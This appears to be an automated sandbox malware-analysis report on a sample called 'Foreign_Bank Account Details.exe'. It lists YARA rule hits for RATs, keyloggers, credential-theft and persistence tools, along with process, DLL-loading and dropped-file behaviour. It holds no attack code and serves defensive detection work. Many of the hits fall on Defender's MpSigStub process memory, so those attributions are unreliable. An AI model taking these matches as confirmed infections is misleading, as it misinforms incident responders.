Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: Red Leaves C&C left in memory, use with Volatility / Rekall Author: David Cannings
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: PoisonIvy_3 Author: Kevin Breen <kevin@techanarchy.net>
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: Detects a ZxShell - CN threat group Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GORAT_5 Author: FireEye
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: Detects ROKRAT malware Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: Webshells Auto-generated - file vanquish.exe Author: Yara Bulk Rule Generator by Florian Roth
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: Red Leaves C&C left in memory, use with Volatility / Rekall Author: David Cannings
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: gh0st Author: https://github.com/jackcr/
Source: 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
Source: 00000023.00000003.18299696915.0000015B1AF24000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp, type: MEMORY Matched rule: Keylogger component Author: Microsoft
Source: 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp, type: MEMORY Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: 00000023.00000003.18339366931.0000015B1C174000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects unspecified malware sample Author: Florian Roth
Source: 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp, type: MEMORY Matched rule: Mirage Identifying Strings Author: Seth Hardy
Source: 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects OilRig malware Author: Eyal Sela
Source: 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp, type: MEMORY Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp, type: MEMORY Matched rule: Red Leaves C&C left in memory, use with Volatility / Rekall Author: David Cannings
Source: 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp, type: MEMORY Matched rule: Webshells Auto-generated - file vanquish.exe Author: Yara Bulk Rule Generator by Florian Roth
Source: 00000023.00000003.18305343223.0000015B1C4E5000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 00000023.00000003.18341085023.0000015B1C4A2000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp, type: MEMORY Matched rule: korlia Author: Nick Hoffman
Source: 00000023.00000003.18332888598.0000015B1C174000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp, type: MEMORY Matched rule: PoisonIvy_3 Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000023.00000003.18297289690.0000015B1BCD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp, type: MEMORY Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: 00000023.00000003.18302210268.0000015B1AF24000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 00000023.00000003.18317322207.0000015B1B5DB000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects a ZxShell - CN threat group Author: Florian Roth
Source: 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp, type: MEMORY Matched rule: CVE_2018_4878_0day_ITW Author: unknown
Source: 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects a ZxShell - CN threat group Author: Florian Roth
Source: 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp, type: MEMORY Matched rule: gh0st Author: https://github.com/jackcr/
Source: 00000023.00000003.18309001390.0000015B1AF24000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 00000023.00000003.18340030081.0000015B1AB4D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Tofu Trojan Author: Cylance
Source: 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 00000023.00000003.18282376211.0000015B1C133000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Crypto Miner strings Author: Florian Roth
Source: 00000023.00000003.18351572125.0000015B1C174000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 00000023.00000003.18282718286.0000015B1C174000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 00000023.00000003.18317647190.0000015B1B61C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 00000023.00000003.18351179947.0000015B1BCD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000023.00000003.18294299849.0000015B1C174000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 00000023.00000003.18313512818.0000015B1B346000.00000004.00000001.sdmp, type: MEMORY Matched rule: HackTool_MSIL_SharPersist_2 Author: FireEye
Source: 00000023.00000003.18306868118.0000015B1AA1D000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: 00000023.00000003.18344475813.0000015B1C1D6000.00000004.00000001.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf-psh.vba Author: Florian Roth
Source: 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects export from Gold Dragon - February 2018 Author: Florian Roth
Source: 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000023.00000003.18318342429.0000015B1C460000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp, type: MEMORY Matched rule: 9002 Identifying Strings Author: Seth Hardy
Source: 00000023.00000003.18346153630.0000015B1AB4D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Tofu Trojan Author: Cylance
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Metasploit Payloads - file msf-psh.vba Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Detects Tofu Trojan Author: Cylance
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Keylogger - generic rule for a Chinese variant Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Detects a ZxShell - CN threat group Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Unidentified Implant by APT29 Author: US CERT
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: HackTool_MSIL_SharPersist_2 Author: FireEye
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Webshells Auto-generated - file vanquish.exe Author: Yara Bulk Rule Generator by Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: 9002 Identifying Strings Author: Seth Hardy
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Mirage Identifying Strings Author: Seth Hardy
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: gh0st Author: https://github.com/jackcr/
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: gholeeV1 Author: unknown
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html Author: unknown
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: NetWiredRC Author: Jean-Philippe Teissier / @Jipe_
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: PoisonIvy_3 Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: CVE_2018_4878_0day_ITW Author: unknown
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Process Stats: CPU usage > 98%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process Stats: CPU usage > 98%
PE file contains strange resources
Source: Foreign_Bank Account Details.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpCmdRun.exe.41.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpCopyAccelerator.exe.41.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpDlpCmd.exe.41.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpCmdRun.exe0.41.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpCopyAccelerator.exe0.41.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpAsDesc.dll.41.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpOAV.dll.41.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpUxAgent.dll.41.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpAsDesc.dll0.41.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpOAV.dll0.41.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Section loaded: edgegdi.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Section loaded: sfc.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Section loaded: phoneinfo.dll
Creates driver files
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\Drivers\WdBoot.sys
Deletes files inside the Windows folder
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File deleted: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\1.1.18500.10_to_1.1.18600.4_mpengine.dll._p Jump to behavior
Found potential string decryption / allocating functions
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: String function: 00007FF650CF0DB4 appears 56 times
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: String function: 00007FF650CF0D88 appears 41 times
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: String function: 00007FF650D4BAAC appears 36 times
Contains functionality to call native functions
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650CFC444 NtQueryInformationProcess,NtQueryInformationProcess,FindCloseChangeNotification,CloseHandle, 42_2_00007FF650CFC444
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D05B80 ReadFile,FlushFileBuffers,SetEndOfFile,NtSetInformationFile, 42_2_00007FF650D05B80
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D05DB4 NtQueryInformationFile,NtQueryInformationFile,RtlNtStatusToDosError, 42_2_00007FF650D05DB4
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650CF9FF0 NtSetInformationFile, 42_2_00007FF650CF9FF0
Sample file is different than original file name gathered from version info
Source: Foreign_Bank Account Details.exe, 00000001.00000000.16839912870.0000000000418000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamefigurmrk.exe vs Foreign_Bank Account Details.exe
Yara detected Winexe tool
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a7b2b8a.201.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a7b1586.200.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c67ca.70.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c6d17.71.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c7264.72.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c67ca.166.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a70f33e.138.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c7264.164.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c6d17.165.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Detected potential crypto function
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_004012D8 1_2_004012D8
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_00402061 1_2_00402061
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_004020E7 1_2_004020E7
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_004022E9 1_2_004022E9
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_0040191F 1_2_0040191F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_012A1130 8_2_012A1130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_012A4320 8_2_012A4320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_012ACFD8 8_2_012ACFD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_012AC278 8_2_012AC278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_012A3A50 8_2_012A3A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_012A3708 8_2_012A3708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_0139C5F8 8_2_0139C5F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_017AC5D8 8_2_017AC5D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_017AE33D 8_2_017AE33D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_017A8FE8 8_2_017A8FE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_017A4EB0 8_2_017A4EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_017AD977 8_2_017AD977
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_017A6519 8_2_017A6519
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_017A9DB8 8_2_017A9DB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_017AFC18 8_2_017AFC18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_017A70E0 8_2_017A70E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_1D267106 8_2_1D267106
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_1D26B9B0 8_2_1D26B9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_1D263C30 8_2_1D263C30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_1D264068 8_2_1D264068
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_1D266E90 8_2_1D266E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_1D26C428 8_2_1D26C428
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_1D26C328 8_2_1D26C328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_1E2E5E08 8_2_1E2E5E08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_1E2E53F0 8_2_1E2E53F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_1E2E4ACC 8_2_1E2E4ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_1E2E5DC1 8_2_1E2E5DC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_1E2E6AF1 8_2_1E2E6AF1
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Code function: 13_2_00103DFE 13_2_00103DFE
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Code function: 15_2_00F53DFE 15_2_00F53DFE
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D09278 42_2_00007FF650D09278
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650CF3728 42_2_00007FF650CF3728
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650CE86BC 42_2_00007FF650CE86BC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650CE9CFC 42_2_00007FF650CE9CFC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650CEFF90 42_2_00007FF650CEFF90
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650CF1FA8 42_2_00007FF650CF1FA8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650CFD038 42_2_00007FF650CFD038
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D5C21C 42_2_00007FF650D5C21C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D0B20C 42_2_00007FF650D0B20C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D10320 42_2_00007FF650D10320
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D2A288 42_2_00007FF650D2A288
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650CE1420 42_2_00007FF650CE1420
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D4E410 42_2_00007FF650D4E410
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D6837C 42_2_00007FF650D6837C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D59520 42_2_00007FF650D59520
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D0C52C 42_2_00007FF650D0C52C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D72504 42_2_00007FF650D72504
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D734D4 42_2_00007FF650D734D4
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D16480 42_2_00007FF650D16480
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D62480 42_2_00007FF650D62480
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D115F8 42_2_00007FF650D115F8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D57600 42_2_00007FF650D57600
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D0A818 42_2_00007FF650D0A818
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D677FC 42_2_00007FF650D677FC
